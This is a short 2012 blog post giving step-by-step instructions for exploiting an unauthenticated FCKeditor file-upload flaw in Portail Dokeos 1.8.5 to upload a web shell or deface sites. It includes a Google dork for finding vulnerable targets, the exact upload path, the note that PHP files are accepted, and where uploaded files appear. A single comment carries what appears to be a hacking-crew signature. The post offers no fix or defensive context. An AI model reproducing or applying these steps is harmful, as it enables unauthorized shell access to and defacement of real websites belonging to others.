SEARCH

x

Friday 17 August 2012

"Portail Dokeos" deface and Shell Upload vulnerability


Portail Dokeos vulnerability is a Kind of FCK editor remote file upload vulnerability in this vulnerability hacker can upload a shell. deface page or any file on website without admin username and password.


Google Dork
"Portail Dokeos 1.8.5"
Exploit http://website/patch/main/inc/lib/fckeditor/editor/filemanager/upload/test.html

Just add "/main/inc/lib/fckeditor/editor/filemanager/upload/test.html" after www.website.com.
You can upload, .html .php .jpg .txt formats here. To view your uploaded file go here : http://website/patch/main/upload/your file here 

1 comment:

  1. we love iran ~~~~~~~~ www.max-team.ir~~~~~~~ miladviper

    ReplyDelete